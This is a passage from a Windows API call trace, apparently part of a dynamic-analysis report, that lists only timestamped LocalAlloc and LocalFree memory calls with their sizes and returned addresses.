(uFlags=0x40, uBytes=0x20) returned 0x4439700 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197de0 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x382a00 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197e60 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x382af0 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197dc0 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x382bb0 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197ec0 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x382b20 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd198020 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x382c70 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197f00 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x382fa0 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197960 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3829d0 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197ee0 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5be2550 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1979a0 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5be20a0 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd198040 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5be2820 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd198060 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5be2cd0 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd198080 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5be30f0 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1979c0 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5be2f70 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197a80 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x43c3e90 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197ac0 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x43c2a20 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1944a0 [0251.723] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x43c3a40 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194180 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x43c3770 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1946c0 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x43c30b0 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd1945e0 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x43c34a0 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1944c0 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5c1e140 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194240 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5c1e620 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194440 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5c1e680 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1946e0 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5c1e980 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194480 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5c1ebc0 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194140 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5c1e1d0 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194780 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x4409f60 [0251.724] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194820 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x440a020 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1948a0 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x4409510 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194200 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x44095d0 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1941e0 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x4409720 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194500 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5cb2f70 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1947a0 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5cb3090 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1944e0 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5cb3240 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1942e0 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5cb1b30 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194400 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x398850 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194920 [0251.725] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x398a60 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194520 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x398b50 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194160 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x398e80 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194420 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3607a0 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1941a0 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x360800 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194460 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x360ad0 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194540 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x43742d0 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194300 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x4374a80 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd194560 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x4374ab0 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194320 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x411550 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1942c0 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x411a30 [0251.726] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194580 [0251.727] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x37ad90 [0251.727] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194900 [0251.727] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x34ea50 [0251.727] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194220 [0251.727] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x334510 [0251.727] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194360 [0251.727] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3cc450 [0251.727] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194840 [0251.727] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x35d560 [0251.727] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1948e0 [0251.727] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d80050 [0251.727] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd194860 [0251.727] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f080 [0251.727] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1945a0 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ed20 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194340 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ed50 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1941c0 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eb70 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd1945c0 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ec90 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd194740 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ecc0 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194600 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee10 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1946a0 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ed80 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194880 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1edb0 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194620 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f200 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd194760 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ede0 [0251.728] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd194640 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1e990 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194720 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1e9c0 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194380 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f260 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1943a0 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee40 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194260 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eed0 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1947c0 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f4a0 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1947e0 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1e9f0 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1943c0 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ec60 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd1948c0 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ea20 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd194800 [0251.729] LocalFree (hMem=0xd1d6e20) returned 0x0 [0251.729] LocalFree (hMem=0xd197ea0) returned 0x0 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd197ea0 [0251.729] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce2060 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194280 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1e70 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd1942a0 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1fc0 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd1943e0 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1fa0 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194660 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1ee0 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194680 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1de0 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194700 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce20f0 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194a00 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1fb0 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194b40 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1df0 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194ba0 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1f140 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0xd194d00 [0251.730] LocalFree (hMem=0x5d1f140) returned 0x0 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194980 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0xd194c20 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0xd194e20 [0251.730] LocalFree (hMem=0xd194c20) returned 0x0 [0251.730] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194ec0 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x24) returned 0x5d1e960 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0xd194c20 [0251.731] LocalFree (hMem=0x5d1e960) returned 0x0 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194c40 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1eba0 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0xd194ee0 [0251.731] LocalFree (hMem=0x5d1eba0) returned 0x0 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd1950a0 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce2050 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd195120 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1f00 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194c60 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x74) returned 0xd209bb0 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x3a) returned 0xd1bdcf0 [0251.731] LocalFree (hMem=0xd209bb0) returned 0x0 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194f60 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1e00 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194fa0 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce2000 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce87f0 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce2010 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce88b0 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1f20 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce8950 [0251.731] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x5ce8a10 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x5ce8c30 [0251.732] LocalFree (hMem=0x5ce8a10) returned 0x0 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce8710 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1e10 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce8750 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1f90 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce8810 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1e30 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce85b0 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce20a0 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce8890 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce2020 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce8630 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1e90 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce8a10 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce2070 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7450 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1d50 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce6fb0 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44324b0 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x26) returned 0x5d1ef90 [0251.732] LocalFree (hMem=0x44324b0) returned 0x0 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce6fd0 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1d60 [0251.732] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce6d30 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d4e0 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7130 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d620 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7150 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d420 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7190 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x24) returned 0x5d1f1a0 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x5ce71b0 [0251.733] LocalFree (hMem=0x5d1f1a0) returned 0x0 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7290 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d4f0 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce6d50 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d400 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce6d70 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d590 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7690 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d380 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce77d0 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d520 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7b70 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d440 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7bf0 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d650 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7970 [0251.733] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d6c0 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce76d0 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d330 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7c10 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d350 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce76f0 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d390 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7890 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d3e0 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7710 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d3f0 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7770 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x36d460 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce77b0 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3e2710 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce77f0 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3e2850 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce78f0 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3e2870 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7eb0 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3e2760 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7f50 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3e2880 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7f90 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3e25c0 [0251.734] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce8090 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3e28c0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce80b0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3e25d0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce8350 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3e2720 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce80d0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3e25e0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce8510 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3e27e0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce8130 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3e26e0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce83f0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3e2640 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce8370 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3e26c0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce83d0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5c229c0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce8410 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5c22a20 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7db0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5c229f0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7dd0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5c22810 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7df0 [0251.735] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5c22af0 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x5ce7e10 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5c22b00 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411c50 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5c22b10 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411db0 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5c228b0 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411eb0 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5c227e0 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411d10 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5c22820 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411d30 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5c228d0 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411d50 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5c22920 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411e30 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5c22930 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411e90 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x43aa0e0 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411ed0 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x43aa0f0 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411ef0 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x43aa1d0 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x44104f0 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x43aa1e0 [0251.736] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4410590 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x43aa2b0 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4410650 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x43aa100 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x44106d0 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x43aa210 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4410810 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x43aa220 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4410bf0 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5be1060 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4410c30 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5be0f10 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4410ef0 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5be11d0 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4410fb0 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5be1110 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411090 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5be1200 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x44112b0 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5be1230 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4410b50 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5be0fc0 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x44110d0 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x444c3b0 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4410f10 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x444c1e0 [0251.737] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4410f90 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x444c290 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411130 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x3490b0 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 